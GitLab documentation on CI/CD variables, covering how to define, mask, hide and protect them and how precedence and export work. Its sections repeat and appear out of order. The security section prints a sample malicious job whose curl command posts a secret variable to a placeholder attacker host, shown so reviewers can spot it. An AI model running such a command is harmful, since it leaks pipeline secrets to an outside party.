    DIR: 'path/to/directory'
    LS_CMD: 'ls "$FLAGS"'
    CD_CMD: 'cd "${DIR}_files"'
  script:
    - 'eval "$LS_CMD"'  # Executes 'ls -al'
    - 'eval "$CD_CMD"'  # Executes 'cd path/to/directory_files'
```

### Use the `$` character in CI/CD variables

If you do not want the `$` character interpreted as the start of another variable, use `$$` instead:

```yaml
job:
  variables:
    FLAGS: '-al'
    LS_CMD: 'ls "$FLAGS" $$TMP_DIR'
  script:
    - 'eval "$LS_CMD"'  # Executes 'ls -al $TMP_DIR'
```

This does not work when [passing a CI/CD variable to a downstream pipeline](../pipelines/downstream_pipelines_troubleshooting.md#variable-with--character-does-not-get-passed-to-a-downstream-pipeline-properly).
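The `eval` and curly-bracket rules in this section are ordinary shell expansion behavior, so they can be checked in a plain POSIX shell outside GitLab. In this sketch `echo` replaces `ls` so the output is predictable:

```shell
# Variables inside variables: single quotes defer expansion until eval runs.
FLAGS='-al'
LS_CMD='echo "flags are $FLAGS"'
eval "$LS_CMD"          # prints: flags are -al

# Curly brackets mark where a variable name ends inside a string.
DIR='path/to/directory'
echo "${DIR}_files"     # prints: path/to/directory_files
```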
For example: ```yaml build-job1: stage: build script: - echo "BUILD_VERSION=v1.0.0" >> build.env artifacts: reports: dotenv: build.env build-job2: stage: build needs: [] script: - echo "This job has no dotenv artifacts" test-job1: stage: test script: - echo "$BUILD_VERSION" # Output is: 'v1.0.0' dependencies: - build-job1 test-job2: stage: test script: - echo "$BUILD_VERSION" # Output is '' dependencies: [] test-job3: stage: test script: - echo "$BUILD_VERSION" # Output is: 'v1.0.0' needs: - build-job1 test-job4: stage: test script: - echo "$BUILD_VERSION" # Output is: 'v1.0.0' needs: - job: build-job1 artifacts: true test-job5: stage: deploy script: - echo "$BUILD_VERSION" # Output is '' needs: - job: build-job1 artifacts: false test-job6: stage: deploy script: - echo "$BUILD_VERSION" # Output is '' needs: - build-job2 ``` ## Pass an environment variable from the `script` section to `artifacts` or `cache` {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/29391) in GitLab 16.4. {{< /history >}} Use `$GITLAB_ENV` to use environment variables defined in the `script` section in the `artifacts` or `cache` keywords. For example: ```yaml build-job: stage: build script: - echo "ARCH=$(arch)" >> $GITLAB_ENV - touch some-file-$(arch) artifacts: paths: - some-file-$ARCH ``` ## Store multiple values in one variable You cannot create a CI/CD variable that is an array of values, but you can use shell scripting techniques for similar behavior. 
For example, you can store multiple values separated by a space in a variable, then loop through the values with a script: ```yaml job1: variables: FOLDERS: src test docs script: - | for FOLDER in $FOLDERS do echo "The path is root/${FOLDER}" done ``` ## Use CI/CD variables in other variables You can use variables inside other variables: ```yaml job: variables: FLAGS: '-al' LS_CMD: 'ls "$FLAGS"' script: - 'eval "$LS_CMD"' # Executes 'ls -al' ``` ### As part of a string You can use variables as part of a string. You can surround the variables with curly brackets (`{}`) to help distinguish the variable name from the surrounding text. Without curly brackets, the adjacent text is interpreted as part of the variable name. For example: ```yaml job: variables: FLAGS: '-al' DIR: 'path/to/directory' LS_CMD: 'ls "$FLAGS"' CD_CMD: 'cd "${DIR}_files"' script: - 'eval "$LS_CMD"' # Executes 'ls -al' - 'eval "$CD_CMD"' # Executes 'cd path/to/directory_files' ``` ### Use the `$` character in CI/CD variables If you do not want the `$` character interpreted as the start of another variable, use `$$` instead: ```yaml job: variables: FLAGS: '-al' LS_CMD: 'ls "$FLAGS" $$TMP_DIR' script: - 'eval "$LS_CMD"' # Executes 'ls -al $TMP_DIR' ``` This does not work when [passing a CI/CD variable to a downstream pipeline](../pipelines/downstream_pipelines_troubleshooting.md#variable-with--character-does-not-get-passed-to-a-downstream-pipeline-properly).
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: GitLab CI/CD variables
description: Configuration, usage, and security.
breadcrumbs:
  - doc
  - ci
  - variables
---
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} CI/CD variables are a type of environment variable. You can use them to: - Control the behavior of jobs and [pipelines](../pipelines/_index.md). - Store values you want to re-use, for example in [job scripts](job_scripts.md). - Avoid hard-coding values in your `.gitlab-ci.yml` file. You can [override variable values](#cicd-variable-precedence) for a specific pipeline when you [run a pipeline manually](../pipelines/_index.md#run-a-pipeline-manually), [run a manual job](../jobs/job_control.md#specify-variables-when-running-manual-jobs), or have them [prefilled in manual pipelines](../pipelines/_index.md#prefill-variables-in-manual-pipelines). Variable names are limited by the [shell the runner uses](https://docs.gitlab.com/runner/shells/) to execute scripts. Each shell has its own set of reserved variable names. To ensure consistent behavior, you should always put variable values in single or double quotes. Variables are internally parsed by the [Psych YAML parser](https://docs.ruby-lang.org/en/master/Psych.html), so quoted and unquoted variables might be parsed differently. For example, `VAR1: 012345` is interpreted as an octal value, so the value becomes `5349`, but `VAR1: "012345"` is parsed as a string with a value of `012345`. For more information about advanced use of GitLab CI/CD, see [7 advanced GitLab CI workflow hacks](https://about.gitlab.com/webcast/7cicd-hacks/) shared by GitLab engineers. ## Predefined CI/CD variables GitLab CI/CD makes a set of [predefined CI/CD variables](predefined_variables.md) available for use in pipeline configuration and job scripts. These variables contain information about the job, pipeline, and other values you might need when the pipeline is triggered or running. You can use predefined CI/CD variables in your `.gitlab-ci.yml` without declaring them first. 
For example: ```yaml job1: stage: test script: - echo "The job's stage is '$CI_JOB_STAGE'" ``` The script in this example outputs `The job's stage is 'test'`. ## Define a CI/CD variable in the `.gitlab-ci.yml` file To create a CI/CD variable in the `.gitlab-ci.yml` file, define the variable and value with the [`variables`](../yaml/_index.md#variables) keyword. Variables saved in the `.gitlab-ci.yml` file are visible to all users with access to the repository, and should store only non-sensitive project configuration. For example, the URL of a database saved in a `DATABASE_URL` variable. Sensitive variables containing values like secrets or keys should be [added in the UI](#define-a-cicd-variable-in-the-ui). You can define `variables` in: - A job: The variable is only available in that job's `script`, `before_script`, or `after_script` sections, and with some [job keywords](../yaml/_index.md#job-keywords). - The top-level of the `.gitlab-ci.yml` file: The variable is available as a default for all jobs in a pipeline, unless a job defines a variable with the same name. The job's variable takes precedence. In both cases, you cannot use these variables with [global keywords](../yaml/_index.md#global-keywords). 
For example: ```yaml variables: ALL_JOBS_VAR: "A default variable" job1: variables: JOB1_VAR: "Job 1 variable" script: - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'" job2: variables: ALL_JOBS_VAR: "Different value than default" JOB2_VAR: "Job 2 variable" script: - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'" ``` In this example: - `job1` outputs: `Variables are 'A default variable' and 'Job 1 variable'` - `job2` outputs: `Variables are 'Different value than default', 'Job 2 variable', and ''` Use the [`value` and `description`](../yaml/_index.md#variablesdescription) keywords to define [variables that are prefilled](../pipelines/_index.md#prefill-variables-in-manual-pipelines) for [manually-triggered pipelines](../pipelines/_index.md#run-a-pipeline-manually). ### Skip default variables in a single job If you don't want default variables to be available in a job, set `variables` to `{}`: ```yaml variables: DEFAULT_VAR: "A default variable" job1: variables: {} script: - echo This job does not need any variables ``` ## Define a CI/CD variable in the UI Sensitive variables like tokens or passwords should be stored in the settings in the UI, not [in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file). Add CI/CD variables in the UI: - For a project [in the project's settings](#for-a-project). - For all projects in a group [in the group's setting](#for-a-group). - For all projects in a GitLab instance [in the instance's settings](#for-an-instance). Alternatively, these variables can be added by using the API: - [With the project-level variables API endpoint](../../api/project_level_variables.md). - [With the group-level variables API endpoint](../../api/group_level_variables.md). - [With the instance-level variables API endpoint](../../api/instance_level_ci_variables.md). By default, pipelines from forked projects can't access the CI/CD variables available to the parent project. 
If you [run a merge request pipeline in the parent project for a merge request from a fork](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project), all variables become available to the pipeline.

### For a project

You can add CI/CD variables to a project's settings. Projects can have a maximum of 8000 CI/CD variables.

Prerequisites:

- You must be a project member with the Maintainer role.

To add or update variables in the project settings:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Settings > CI/CD**.
1. Expand **Variables**.
1. Select **Add variable** and fill in the details:
   - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`.
   - **Value**: No limitations.
   - **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables).
   - **Environment scope**: Optional. **All (default)** (`*`), a specific [environment](../environments/_index.md#types-of-environments), or a wildcard [environment scope](../environments/_index.md#limit-the-environment-scope-of-a-cicd-variable).
   - **Protect variable**: Optional. If selected, the variable is only available in pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md).
   - **Visibility**: Select **Visible** (default), [**Masked**](#mask-a-cicd-variable), or [**Masked and hidden**](#hide-a-cicd-variable) (only available for new variables).

After you create a variable, you can use it in the pipeline configuration or in [job scripts](job_scripts.md).

### For a group

You can make a CI/CD variable available to all projects in a group. Groups can have a maximum of 30000 CI/CD variables.

Prerequisites:

- You must be a group member with the Owner role.

To add a group variable:

1. On the left sidebar, select **Search or go to** and find your group.
1. Select **Settings > CI/CD**.
1. Expand **Variables**.
1.
Select **Add variable** and fill in the details:
   - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`.
   - **Value**: No limitations.
   - **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables).
   - **Protect variable**: Optional. If selected, the variable is only available in pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md).
   - **Visibility**: Select **Visible** (default), [**Masked**](#mask-a-cicd-variable), or [**Masked and hidden**](#hide-a-cicd-variable) (only available for new variables).

The group variables that are available in a project are listed in the project's **Settings > CI/CD > Variables** section. Variables from [subgroups](../../user/group/subgroups/_index.md) are recursively inherited.

#### Environment scope

{{< details >}}

- Tier: Premium, Ultimate

{{< /details >}}

To set a group CI/CD variable to only be available for certain environments:

1. On the left sidebar, select **Search or go to** and find your group.
1. Select **Settings > CI/CD**.
1. Expand **Variables**.
1. To the right of the variable, select **Edit** ({{< icon name="pencil" >}}).
1. For **Environment scope**, select **All (default)** (`*`), a specific [environment](../environments/_index.md#types-of-environments), or a wildcard [environment scope](../environments/_index.md#limit-the-environment-scope-of-a-cicd-variable).

### For an instance

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

You can make a CI/CD variable available to all projects and groups in a GitLab instance.

Prerequisites:

- You must have administrator access to the instance.

To add an instance variable:

1. On the left sidebar, at the bottom, select **Admin**.
1. Select **Settings > CI/CD**.
1. Expand **Variables**.
1.
Select **Add variable** and fill in the details:
   - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`.
   - **Value**: The value is limited to 10,000 characters, but also bounded by any limits in the runner's operating system.
   - **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables).
   - **Protect variable**: Optional. If selected, the variable is only available in pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md).
   - **Visibility**: Select **Visible** (default), [**Masked**](#mask-a-cicd-variable), or [**Masked and hidden**](#hide-a-cicd-variable) (only available for new variables).

## CI/CD variable security

Code pushed to the `.gitlab-ci.yml` file could compromise your variables. Variables could be accidentally exposed in a job log, or maliciously sent to a third-party server.

Review all merge requests that introduce changes to the `.gitlab-ci.yml` file before you:

- [Run a pipeline in the parent project for a merge request submitted from a forked project](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project).
- Merge the changes.

Review the `.gitlab-ci.yml` file of imported projects before you add files or run pipelines against them.

The following example shows malicious code in a `.gitlab-ci.yml` file:

```yaml
accidental-leak-job:
  script:
    # Password exposed accidentally
    - echo "This script logs into the DB with $USER $PASSWORD"
    - db-login $USER $PASSWORD

malicious-job:
  script:
    # Secret exposed maliciously
    - curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/"
```

To help reduce the risk of accidentally leaking secrets through scripts like in `accidental-leak-job`, all variables containing sensitive information should always be [masked in job logs](#mask-a-cicd-variable).
You can also [limit a variable to protected branches and tags only](#protect-a-cicd-variable).

Alternatively, use one of the native GitLab integrations to connect with third-party secrets manager providers to store and retrieve secrets:

- [HashiCorp Vault](../secrets/_index.md)
- [Azure Key Vault](../secrets/azure_key_vault.md)
- [Google Secret Manager](../secrets/gcp_secret_manager.md)

You can also use [OpenID Connect (OIDC) authentication](../secrets/id_token_authentication.md) for secrets managers that do not have a native integration.

Malicious scripts like in `malicious-job` must be caught during the review process. Reviewers should never trigger a pipeline when they find code like this, because malicious code can compromise both masked and protected variables.

Variable values are encrypted using [`aes-256-cbc`](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) and stored in the database. This data can only be read and decrypted with a valid [secrets file](../../administration/backup_restore/troubleshooting_backup_gitlab.md#when-the-secrets-file-is-lost).

### Mask a CI/CD variable

{{< alert type="warning" >}}

Masking a CI/CD variable is not a guaranteed way to prevent malicious users from accessing variable values. To ensure security of sensitive information, consider using [external secrets](../secrets/_index.md) and [file type variables](#use-file-type-cicd-variables) to prevent commands such as `env`/`printenv` from printing secret variables.

{{< /alert >}}

You can mask a project, group, or instance CI/CD variable so the value of the variable does not display in job logs. When a masked CI/CD variable would be displayed in a job log, the value is replaced with `[masked]` to prevent the value from being exposed.

Prerequisites:

- You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui).

To mask a variable:

1.
For the group, project, or in the **Admin** area, select **Settings > CI/CD**.
1. Expand **Variables**.
1. Next to the variable you want to mask, select **Edit**.
1. Under **Visibility**, select **Mask variable**.
1. Select **Update variable**.

The method used to mask variables [limits what can be included in a masked variable](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/13784#note_106756757). The value of the variable must:

- Be a single line with no spaces.
- Be 8 characters or longer.
- Not match the name of an existing predefined or custom CI/CD variable.
- Not include non-alphanumeric characters other than `@`, `_`, `-`, `:`, or `+`.

Additionally, if [variable expansion](#prevent-cicd-variable-expansion) is enabled, the value can contain only:

- Characters from the Base64 alphabet (RFC4648).
- The `@`, `:`, `.`, or `~` characters.

Masking a variable automatically masks the value anywhere in a job log. If another variable has the same value, that value is also masked, including when a variable references a masked variable. The string `[MASKED]` is shown instead of the value, possibly with some trailing `x` characters.

Secrets could be revealed when `CI_DEBUG_SERVICES` is enabled. For details, read about [service container logging](../services/_index.md#capturing-service-container-logs).

### Hide a CI/CD variable

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/29674) in GitLab 17.4 [with a flag](../../administration/feature_flags/_index.md) named `ci_hidden_variables`. Enabled by default.
- [Generally available](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/165843) in GitLab 17.6. Feature flag `ci_hidden_variables` removed.

{{< /history >}}

In addition to masking, you can also prevent the value of CI/CD variables from being revealed in the **CI/CD** settings page. You can hide a variable only when you create it; you cannot update an existing variable to be hidden.
Prerequisites: - You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). - The variable value must match the [requirements for masked variables](#mask-a-cicd-variable). To hide a variable, select **Masked and hidden** in the **Visibility** section when you [add a new CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). After you save the variable, the variable can be used in CI/CD pipelines, but cannot be revealed in the UI again. ### Protect a CI/CD variable You can configure a project, group, or instance CI/CD variable to be available only to pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md). [Merged results pipelines](../pipelines/merged_results_pipelines.md) and [merge request pipelines](../pipelines/merge_request_pipelines.md) can optionally [access protected variables](../pipelines/merge_request_pipelines.md#control-access-to-protected-variables-and-runners). Prerequisites: - You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). To set a variable as protected: 1. For the project or group, go to **Settings > CI/CD**. 1. Expand **Variables**. 1. Next to the variable you want to protect, select **Edit**. 1. Select the **Protect variable** checkbox. 1. Select **Update variable**. The variable is available for all subsequent pipelines. ### Use file type CI/CD variables All predefined CI/CD variables and variables defined in the `.gitlab-ci.yml` file are "variable" type ([`variable_type` of `env_var` in the API](#define-a-cicd-variable-in-the-ui)). Variable type variables: - Consist of a key and value pair. - Are made available in jobs as environment variables, with: - The CI/CD variable key as the environment variable name. - The CI/CD variable value as the environment variable value. 
Project, group, and instance CI/CD variables are "variable" type by default, but can optionally be set as a "file" type ([`variable_type` of `file` in the API](#define-a-cicd-variable-in-the-ui)). File type variables: - Consist of a key, value, and file. - Are made available in jobs as environment variables, with: - The CI/CD variable key as the environment variable name. - The CI/CD variable value saved to a temporary file. - The path to the temporary file as the environment variable value. Use file type CI/CD variables for tools that need a file as input. [The AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html) and [`kubectl`](https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/#the-kubeconfig-environment-variable) are both tools that use `File` type variables for configuration. For example, if you are using `kubectl` with: - A variable with a key of `KUBE_URL` and `https://example.com` as the value. - A file type variable with a key of `KUBE_CA_PEM` and a certificate as the value. Pass `KUBE_URL` as a `--server` option, which accepts a variable, and pass `$KUBE_CA_PEM` as a `--certificate-authority` option, which accepts a path to a file: ```shell kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM" ``` #### Use a `.gitlab-ci.yml` variable as a file type variable You cannot set a CI/CD variable [defined in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file) as a file type variable. If you have a tool that requires a file path as an input, but you want to use a variable defined in the `.gitlab-ci.yml`: - Run a command that saves the value of the variable in a file. - Use that file with your tool. 
For example:

```yaml
variables:
  SITE_URL: "https://gitlab.example.com"

job:
  script:
    - echo "$SITE_URL" > "site-url.txt"
    - mytool --url-file="site-url.txt"
```

## Prevent CI/CD variable expansion

Expanded variables treat values with the `$` character as a reference to another variable. CI/CD variables are expanded by default. To treat variables with a `$` character as raw strings, disable variable expansion for the variable.

Prerequisites:

- You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui).

To disable variable expansion for the variable:

1. For the project or group, go to **Settings > CI/CD**.
1. Expand **Variables**.
1. Next to the variable you do not want expanded, select **Edit**.
1. Clear the **Expand variable** checkbox.
1. Select **Update variable**.

## CI/CD variable precedence

{{< history >}}

- Scan Execution Policies variable precedence was [changed](https://gitlab.com/gitlab-org/gitlab/-/issues/424028) in GitLab 16.7 [with a flag](../../administration/feature_flags/_index.md) named `security_policies_variables_precedence`. Enabled by default. [Feature flag removed in GitLab 16.8](https://gitlab.com/gitlab-org/gitlab/-/issues/435727).

{{< /history >}}

You can use CI/CD variables with the same name in different places, but the values can overwrite each other. The variable type and where it is defined determine which value takes precedence.

The order of precedence for variables is (from highest to lowest):

1. [Pipeline execution policy variables](../../user/application_security/policies/pipeline_execution_policies.md#cicd-variables).
1. [Scan execution policy variables](../../user/application_security/policies/scan_execution_policies.md).
1. [Pipeline variables](#use-pipeline-variables). These variables all have the same precedence:
   - [Variables passed to downstream pipelines](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline).
- [Trigger variables](../triggers/_index.md#pass-cicd-variables-in-the-api-call). - [Scheduled pipeline variables](../pipelines/schedules.md#add-a-pipeline-schedule). - [Manual pipeline run variables](../pipelines/_index.md#run-a-pipeline-manually). - Variables added when [creating a pipeline with the API](../../api/pipelines.md#create-a-new-pipeline). - [Manual job variables](../jobs/job_control.md#specify-variables-when-running-manual-jobs). 1. Project [variables](#for-a-project). 1. Group [variables](#for-a-group). If the same variable name exists in a group and its subgroups, the job uses the value from the closest subgroup. For example, if you have `Group > Subgroup 1 > Subgroup 2 > Project`, the variable defined in `Subgroup 2` takes precedence. 1. Instance [variables](#for-an-instance). 1. [Variables from `dotenv` reports](job_scripts.md#pass-an-environment-variable-to-another-job). 1. Job variables, defined in jobs in the `.gitlab-ci.yml` file. 1. Default variables for all jobs, defined at the top-level of the `.gitlab-ci.yml` file. 1. [Deployment variables](predefined_variables.md#deployment-variables). 1. [Predefined variables](predefined_variables.md). For example: ```yaml variables: API_TOKEN: "default" job1: variables: API_TOKEN: "secure" script: - echo "The variable is '$API_TOKEN'" ``` In this example, `job1` outputs `The variable is 'secure'` because variables defined in jobs in the `.gitlab-ci.yml` file have higher precedence than default variables. ## Use pipeline variables Pipeline variables are variables that are specified when running a new pipeline. Prerequisites: - You must have the Developer role in the project. You can specify a pipeline variable when you: - [Run a pipeline manually](../pipelines/_index.md#run-a-pipeline-manually) in the UI. - Create a pipeline by using [the `pipelines` API endpoint](../../api/pipelines.md#create-a-new-pipeline). 
- Create a pipeline by using [the `triggers` API endpoint](../triggers/_index.md#pass-cicd-variables-in-the-api-call).
- Use [push options](../../topics/git/commit.md#push-options-for-gitlab-cicd).
- Pass variables to a downstream pipeline by using the [`variables` keyword](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline), the [`trigger:forward` keyword](../yaml/_index.md#triggerforward), or [`dotenv` variables](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job).

These variables have [higher precedence](#cicd-variable-precedence) and can override other defined variables, including [predefined variables](predefined_variables.md).

{{< alert type="warning" >}}

You should avoid overriding predefined variables in most cases, as it can cause the pipeline to behave unexpectedly.

{{< /alert >}}

{{< alert type="note" >}}

In [GitLab 17.7](../../update/deprecations.md#increased-default-security-for-use-of-pipeline-variables) and later, [pipeline inputs](../inputs/_index.md#for-a-pipeline) are recommended over passing pipeline variables. For enhanced security, you should [disable pipeline variables](#restrict-pipeline-variables) when using inputs.

{{< /alert >}}

### Restrict pipeline variables

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/440338) in GitLab 17.1.
- For GitLab.com, setting defaults [updated for all new projects in new namespaces](https://gitlab.com/gitlab-org/gitlab/-/issues/502382) to `no_one_allowed` for `ci_pipeline_variables_minimum_override_role` in GitLab 17.7.

{{< /history >}}

You can limit who can [run pipelines with pipeline variables](#use-pipeline-variables) to specific user roles. When users with a lower role try to use pipeline variables, they receive an `Insufficient permissions to set pipeline variables` error message.

Prerequisites:

- You must have the Maintainer role in the project.
If the minimum role was previously set to `owner` or `no_one_allowed`, then you must have the Owner role in the project.

To set the minimum role that can use pipeline variables:

- Go to **Settings > CI/CD > Variables**.
- Under **Minimum role to use pipeline variables**, select one of:
  - `no_one_allowed`: No pipelines can run with pipeline variables. Default for new projects in new namespaces on GitLab.com.
  - `owner`: Only users with the Owner role can run pipelines with pipeline variables. You must have the Owner role for the project to change the setting to this value.
  - `maintainer`: Only users with at least the Maintainer role can run pipelines with pipeline variables. Default when not specified on GitLab Self-Managed and GitLab Dedicated.
  - `developer`: Only users with at least the Developer role can run pipelines with pipeline variables.

You can also use [the projects API](../../api/projects.md#edit-a-project) to set the role for the `ci_pipeline_variables_minimum_override_role` setting.

This restriction does not affect the use of CI/CD variables from the project or group settings. Most jobs can still use the `variables` keyword in the YAML configuration, but not jobs that use the `trigger` keyword to trigger downstream pipelines. Trigger jobs pass variables to a downstream pipeline as pipeline variables, which is also controlled by this setting.

## Exporting variables

Scripts executed in separate shell contexts do not share exports, aliases, local function definitions, or any other local shell updates. This means that if a job fails, variables created by user-defined scripts are not exported.

When runners execute jobs defined in `.gitlab-ci.yml`:

- Scripts specified in `before_script` and the main script are executed together in a single shell context, and are concatenated.
- Scripts specified in `after_script` run in a shell context completely separate from the `before_script` and the specified scripts.
Regardless of the shell the scripts are executed in, the runner output includes: - Predefined variables. - Variables defined in: - Instance, group, or project CI/CD settings. - The `.gitlab-ci.yml` file in the `variables:` section. - The `.gitlab-ci.yml` file in the `secrets:` section. - The `config.toml`. The runner cannot handle manual exports, shell aliases, and functions executed in the body of the script, like `export MY_VARIABLE=1`. For example, in the following `.gitlab-ci.yml` file, the following scripts are defined: ```yaml job: variables: JOB_DEFINED_VARIABLE: "job variable" before_script: - echo "This is the 'before_script' script" - export MY_VARIABLE="variable" script: - echo "This is the 'script' script" - echo "JOB_DEFINED_VARIABLE's value is ${JOB_DEFINED_VARIABLE}" - echo "CI_COMMIT_SHA's value is ${CI_COMMIT_SHA}" - echo "MY_VARIABLE's value is ${MY_VARIABLE}" after_script: - echo "JOB_DEFINED_VARIABLE's value is ${JOB_DEFINED_VARIABLE}" - echo "CI_COMMIT_SHA's value is ${CI_COMMIT_SHA}" - echo "MY_VARIABLE's value is ${MY_VARIABLE}" ``` When the runner executes the job: 1. `before_script` is executed: 1. Prints to the output. 1. Defines the variable for `MY_VARIABLE`. 1. `script` is executed: 1. Prints to the output. 1. Prints the value of `JOB_DEFINED_VARIABLE`. 1. Prints the value of `CI_COMMIT_SHA`. 1. Prints the value of `MY_VARIABLE`. 1. `after_script` is executed in a new, separate shell context: 1. Prints to the output. 1. Prints the value of `JOB_DEFINED_VARIABLE`. 1. Prints the value of `CI_COMMIT_SHA`. 1. Prints an empty value of `MY_VARIABLE`. The variable value cannot be detected because `after_script` is in a separate shell context to `before_script`. ## Related topics - You can configure [Auto DevOps](../../topics/autodevops/_index.md) to pass CI/CD variables to a running application. 
To make a CI/CD variable available as an environment variable in the running application's container, [prefix the variable key](../../topics/autodevops/cicd_variables.md#configure-application-secret-variables) with `K8S_SECRET_`. - The [Managing the Complex Configuration Data Management Monster Using GitLab](https://www.youtube.com/watch?v=v4ZOJ96hAck) video is a walkthrough of the [Complex Configuration Data Monorepo](https://gitlab.com/guided-explorations/config-data-top-scope/config-data-subscope/config-data-monorepo) working example project. It explains how multiple levels of group CI/CD variables can be combined with environment-scoped project variables for complex configuration of application builds or deployments. The example can be copied to your own group or instance for testing. More details on what other GitLab CI patterns are demonstrated are available at the project page. - You can [pass CI/CD variables to downstream pipelines](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline). Use [`trigger:forward` keyword](../yaml/_index.md#triggerforward) to specify what type of variables to pass to the downstream pipeline.
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: GitLab CI/CD variables description: Configuration, usage, and security. breadcrumbs: - doc - ci - variables --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} CI/CD variables are a type of environment variable. You can use them to: - Control the behavior of jobs and [pipelines](../pipelines/_index.md). - Store values you want to re-use, for example in [job scripts](job_scripts.md). - Avoid hard-coding values in your `.gitlab-ci.yml` file. You can [override variable values](#cicd-variable-precedence) for a specific pipeline when you [run a pipeline manually](../pipelines/_index.md#run-a-pipeline-manually), [run a manual job](../jobs/job_control.md#specify-variables-when-running-manual-jobs), or have them [prefilled in manual pipelines](../pipelines/_index.md#prefill-variables-in-manual-pipelines). Variable names are limited by the [shell the runner uses](https://docs.gitlab.com/runner/shells/) to execute scripts. Each shell has its own set of reserved variable names. To ensure consistent behavior, you should always put variable values in single or double quotes. Variables are internally parsed by the [Psych YAML parser](https://docs.ruby-lang.org/en/master/Psych.html), so quoted and unquoted variables might be parsed differently. For example, `VAR1: 012345` is interpreted as an octal value, so the value becomes `5349`, but `VAR1: "012345"` is parsed as a string with a value of `012345`. For more information about advanced use of GitLab CI/CD, see [7 advanced GitLab CI workflow hacks](https://about.gitlab.com/webcast/7cicd-hacks/) shared by GitLab engineers. 
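The quoting behavior described above can be sketched in a small `.gitlab-ci.yml` fragment. This is an illustrative example only; the job and variable names are not from the official documentation:

```yaml
quoting-demo:
  variables:
    UNQUOTED_VAR: 012345    # YAML 1.1 octal literal; parsed as the integer 5349
    QUOTED_VAR: "012345"    # quoted; parsed as the string 012345
  script:
    - echo "UNQUOTED_VAR is $UNQUOTED_VAR"   # prints 5349
    - echo "QUOTED_VAR is $QUOTED_VAR"       # prints 012345
```

Quoting both values identically avoids this class of surprise entirely.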
## Predefined CI/CD variables GitLab CI/CD makes a set of [predefined CI/CD variables](predefined_variables.md) available for use in pipeline configuration and job scripts. These variables contain information about the job, pipeline, and other values you might need when the pipeline is triggered or running. You can use predefined CI/CD variables in your `.gitlab-ci.yml` without declaring them first. For example: ```yaml job1: stage: test script: - echo "The job's stage is '$CI_JOB_STAGE'" ``` The script in this example outputs `The job's stage is 'test'`. ## Define a CI/CD variable in the `.gitlab-ci.yml` file To create a CI/CD variable in the `.gitlab-ci.yml` file, define the variable and value with the [`variables`](../yaml/_index.md#variables) keyword. Variables saved in the `.gitlab-ci.yml` file are visible to all users with access to the repository, and should store only non-sensitive project configuration. For example, the URL of a database saved in a `DATABASE_URL` variable. Sensitive variables containing values like secrets or keys should be [added in the UI](#define-a-cicd-variable-in-the-ui). You can define `variables` in: - A job: The variable is only available in that job's `script`, `before_script`, or `after_script` sections, and with some [job keywords](../yaml/_index.md#job-keywords). - The top-level of the `.gitlab-ci.yml` file: The variable is available as a default for all jobs in a pipeline, unless a job defines a variable with the same name. The job's variable takes precedence. In both cases, you cannot use these variables with [global keywords](../yaml/_index.md#global-keywords). 
For example:

```yaml
variables:
  ALL_JOBS_VAR: "A default variable"

job1:
  variables:
    JOB1_VAR: "Job 1 variable"
  script:
    - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'"

job2:
  variables:
    ALL_JOBS_VAR: "Different value than default"
    JOB2_VAR: "Job 2 variable"
  script:
    - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'"
```

In this example:

- `job1` outputs: `Variables are 'A default variable' and 'Job 1 variable'`
- `job2` outputs: `Variables are 'Different value than default', 'Job 2 variable', and ''`

